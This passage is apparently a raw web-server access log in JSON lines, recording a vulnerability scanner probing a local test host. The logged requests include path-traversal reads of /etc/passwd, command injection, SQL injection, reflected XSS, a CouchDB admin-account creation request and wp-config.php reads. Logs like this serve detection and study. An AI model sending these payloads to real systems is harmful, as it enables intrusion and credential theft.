"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ads/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22user\x22,\x0D\x0A \x22name\x22: \x22poc\x22,\x0D\x0A \x22roles\x22: [\x22_admin\x22],\x0D\x0A \x22roles\x22: [],\x0D\x0A \x22password\x22: \x22123456\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_users/org.couchdb.user:poc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserve/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wiki HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 